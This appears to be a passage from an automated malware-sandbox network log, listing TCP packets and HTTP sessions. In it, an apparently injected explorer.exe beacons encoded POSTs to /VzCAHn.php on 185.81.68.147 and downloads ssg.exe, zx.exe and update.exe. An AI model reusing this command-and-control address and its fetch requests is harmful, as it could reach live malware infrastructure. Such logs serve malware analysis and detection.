                                                                                                                                                                                                                      Dec 17, 2024 10:16:00.193325043 CET8049739185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:00.193492889 CET8049739185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:00.193909883 CET4973980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:00.195796013 CET4973980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:00.301690102 CET4974080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:00.315706968 CET8049739185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:00.421422958 CET8049740185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:00.421552896 CET4974080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:00.421674967 CET4974080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:00.541668892 CET8049740185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:00.541811943 CET4974080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:00.661511898 CET8049740185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:02.026175976 CET8049740185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:02.026490927 CET8049740185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:02.027401924 CET4974080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:02.027401924 CET4974080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:02.129544020 CET4974180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:02.147085905 CET8049740185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:02.250161886 CET8049741185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:02.250255108 CET4974180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:02.250353098 CET4974180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:02.370096922 CET8049741185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:02.374135971 CET4974180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:02.493957043 CET8049741185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:03.940649986 CET8049741185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:03.940783978 CET8049741185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:03.940841913 CET4974180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:03.987761021 CET4974180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:04.100778103 CET4974280192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:04.107700109 CET8049741185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:04.220618963 CET8049742185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:04.220689058 CET4974280192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:04.220741034 CET4974280192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:04.340672016 CET8049742185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:04.340763092 CET4974280192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:04.460477114 CET8049742185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:05.931310892 CET8049742185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:05.931555986 CET8049742185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:05.932360888 CET4974280192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:05.932904959 CET4974280192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:06.036081076 CET4974380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:06.052824020 CET8049742185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:06.155841112 CET8049743185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:06.155999899 CET4974380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:06.155999899 CET4974380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:06.275726080 CET8049743185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:06.275787115 CET4974380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:06.395940065 CET8049743185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:07.799942017 CET8049743185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:07.800143003 CET8049743185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:07.800190926 CET4974380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:07.802088022 CET4974380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:27.694597960 CET8049756185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:27.694695950 CET8049756185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:27.694761992 CET4975680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:27.696218967 CET4975680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:27.801796913 CET4975780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:27.815893888 CET8049756185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:27.921530962 CET8049757185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:27.921674013 CET4975780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:27.921786070 CET4975780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:28.041497946 CET8049757185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:28.041588068 CET4975780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:28.161736012 CET8049757185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:29.536186934 CET8049757185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:29.536333084 CET8049757185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:29.536426067 CET4975780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:29.537741899 CET4975780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:29.645407915 CET4975880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:29.657656908 CET8049757185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:29.766916037 CET8049758185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:29.767024994 CET4975880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:29.767126083 CET4975880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:29.887058020 CET8049758185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:29.887168884 CET4975880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:30.006990910 CET8049758185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:31.385351896 CET8049758185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:31.385462046 CET8049758185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:31.385612965 CET4975880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:31.386857986 CET4975880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:31.489275932 CET4975980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:31.506635904 CET8049758185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:31.609932899 CET8049759185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:31.610037088 CET4975980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:31.610156059 CET4975980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:31.731009007 CET8049759185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:31.731168985 CET4975980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:31.850963116 CET8049759185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:33.230658054 CET8049759185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:33.230787039 CET8049759185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:33.230844021 CET4975980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:33.232070923 CET4975980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:33.335645914 CET4976080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:33.351835966 CET8049759185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:33.457858086 CET8049760185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:33.458137989 CET4976080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:33.458137989 CET4976080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:33.577887058 CET8049760185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:33.578124046 CET4976080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:33.698024988 CET8049760185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:34.917346954 CET8049760185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:34.917454004 CET8049760185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:34.917650938 CET4976080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:34.919332027 CET4976080192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:35.020401001 CET4976180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:35.039067984 CET8049760185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:35.164174080 CET8049761185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:35.164336920 CET4976180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:35.164423943 CET4976180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:35.293728113 CET8049761185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:35.293823957 CET4976180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:35.413606882 CET8049761185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:36.760782003 CET8049761185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:36.761594057 CET8049761185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:36.761706114 CET4976180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:36.768223047 CET4976180192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:36.879977942 CET4976280192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:36.888135910 CET8049761185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:37.000005007 CET8049762185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:37.000117064 CET4976280192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:37.000183105 CET4976280192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:37.120079041 CET8049762185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:37.120145082 CET4976280192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:37.240015984 CET8049762185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:38.624383926 CET8049762185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:38.624545097 CET8049762185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:38.624588966 CET4976280192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:38.625947952 CET4976280192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:38.739248991 CET4976380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:38.745919943 CET8049762185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:38.859097004 CET8049763185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:38.859298944 CET4976380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:38.859333992 CET4976380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:38.979477882 CET8049763185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:38.979604006 CET4976380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:39.099868059 CET8049763185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:40.303961992 CET8049763185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:40.304143906 CET8049763185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:40.304272890 CET4976380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:40.305447102 CET4976380192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:40.411099911 CET4976480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:40.425256014 CET8049763185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:40.531284094 CET8049764185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:40.531369925 CET4976480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:40.531418085 CET4976480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:40.651222944 CET8049764185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:40.651293993 CET4976480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:16:40.771143913 CET8049764185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:42.154747009 CET8049764185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:16:42.154958010 CET8049764185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:17:01.412868977 CET8049775185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:17:01.412945032 CET8049775185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:17:01.413001060 CET4977580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:17:04.638384104 CET4977580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:17:04.758138895 CET8049775185.81.68.147192.168.2.8
                                                                                                                                                                                                                      • 185.81.68.147
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49705 | 185.81.68.147 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 10:14:55.911230087 CET | 259 | OUT | POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Dec 17, 2024 10:14:57.238166094 CET | 257 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:14:56 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 40
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                      Data Raw: 35 38 63 38 65 37 36 33 31 38 35 66 38 30 33 61 35 36 63 38 64 32 36 65 33 63 62 34 66 65 61 66 38 31 32 32 38 61 63 36
                                                                                                                                                                                                                      Data Ascii: 58c8e763185f803a56c8d26e3cb4feaf81228ac6


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49706 | 185.81.68.147 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 10:14:57.368565083 CET | 279 | OUT | POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 37
Dec 17, 2024 10:14:57.488604069 CET | 37 | OUT | Data Raw: 57 57 17 44 57 19 00 4f 00 08 49 56 44 00 4f 51 49 7e 36 7a 21 60 62 48 63 20 1e 5c 13 07 04 14 4c 4d 03 4e 01
                                                                                                                                                                                                                      Data Ascii: WWDWOIVDOQI~6z!`bHc \LMN
Dec 17, 2024 10:14:58.920505047 CET | 216 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:14:58 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49707 | 185.81.68.147 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 10:14:59.048096895 CET | 278 | OUT | POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
Dec 17, 2024 10:14:59.168984890 CET | 6 | OUT | Data Raw: 45 51 0d 5f
                                                                                                                                                                                                                      Data Ascii: EQ_
Dec 17, 2024 10:15:00.656069994 CET | 315 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:14:59 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 98
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                      Data Raw: 05 44 0b 4c 11 47 0c 1c 1e 09 0d 53 16 08 02 4f 03 0e 4d 09 50 05 19 16 40 04 4c 51 1e 00 6c 6c 08 4d 5a 46 4c 11 59 19 1a 09 5b 0d 4b 0f 07 1d 07 00 1b 57 0c 07 1c 1b 4d 18 06 40 01 3f 3c 54 4f 0b 16 40 16 5f 4e 49 09 09 07 1c 00 50 4d 00 0d 16 52 0c 52 18 43 43 55 59 41 03 16 55 4b 04 38 3c
                                                                                                                                                                                                                      Data Ascii: DLGSOMP@LQllMZFLY[KWM@?<TO@_NIPMRRCCUYAUK8<


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 49708 | 185.81.68.147 | 80 | 4084 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 10:15:00.778542995 CET | 232 | OUT | GET /ssg.exe HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Dec 17, 2024 10:15:02.108469009 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:15:01 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      Last-Modified: Thu, 12 Dec 2024 10:50:51 GMT
                                                                                                                                                                                                                      ETag: "4b200-629107cd804d2"
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Content-Length: 307712
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: application/x-msdownload


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.8 | 49709 | 185.81.68.147 | 80 | 4084 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 10:15:03.335921049 CET | 231 | OUT | GET /zx.exe HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Dec 17, 2024 10:15:04.677186012 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 17:15:03 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Sun, 15 Dec 2024 08:15:56 GMT
ETag: "5a4530-6294aac656b58"
Accept-Ranges: bytes
Content-Length: 5915952
Connection: close
Content-Type: application/x-msdownload


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.8 | 49714 | 185.81.68.147 | 80 | 4084 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 10:15:14.604423046 CET | 235 | OUT | GET /update.exe HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Dec 17, 2024 10:15:15.930721045 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 17:15:15 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Mon, 16 Dec 2024 19:28:25 GMT
ETag: "4c400-629682f2e4e8d"
Accept-Ranges: bytes
Content-Length: 312320
Connection: close
Content-Type: application/x-msdownload


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
6           192.168.2.8  49715        185.81.68.147   80                4084  C:\Windows\explorer.exe

Timestamp  Bytes transferred  Direction  Data
Dec 17, 2024 10:15:17.281202078 CET  278  OUT  POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 17, 2024 10:15:17.401243925 CET  6  OUT  Data Raw: 45 51 0d 5f
Data Ascii: EQ_
Dec 17, 2024 10:15:18.919783115 CET  216  IN  HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 17:15:17 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
7           192.168.2.8  49716        185.81.68.147   80                4084  C:\Windows\explorer.exe

Timestamp  Bytes transferred  Direction  Data
Dec 17, 2024 10:15:19.156919003 CET  278  OUT  POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 17, 2024 10:15:19.277745962 CET  6  OUT  Data Raw: 45 51 0d 5f
Data Ascii: EQ_
Dec 17, 2024 10:15:20.606235981 CET  216  IN  HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 17:15:19 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
8           192.168.2.8  49717        185.81.68.147   80                4084  C:\Windows\explorer.exe

Timestamp  Bytes transferred  Direction  Data
Dec 17, 2024 10:15:20.843328953 CET  278  OUT  POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 17, 2024 10:15:20.963258028 CET  6  OUT  Data Raw: 45 51 0d 5f
Data Ascii: EQ_
Dec 17, 2024 10:15:22.451704025 CET  216  IN  HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 17:15:21 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
9           192.168.2.8  49718        185.81.68.147   80                4084  C:\Windows\explorer.exe

Timestamp  Bytes transferred  Direction  Data
Dec 17, 2024 10:15:22.713570118 CET  278  OUT  POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 17, 2024 10:15:22.833981991 CET  6  OUT  Data Raw: 45 51 0d 5f
Data Ascii: EQ_
Dec 17, 2024 10:15:24.355389118 CET  216  IN  HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 17:15:23 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
10          192.168.2.8  49719        185.81.68.147   80                4084  C:\Windows\explorer.exe

Timestamp  Bytes transferred  Direction  Data
Dec 17, 2024 10:15:24.581036091 CET  278  OUT  POST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 17, 2024 10:15:24.701143026 CET  6  OUT  Data Raw: 45 51 0d 5f
Data Ascii: EQ_
Dec 17, 2024 10:15:26.012465000 CET  216  IN  HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 17:15:25 GMT
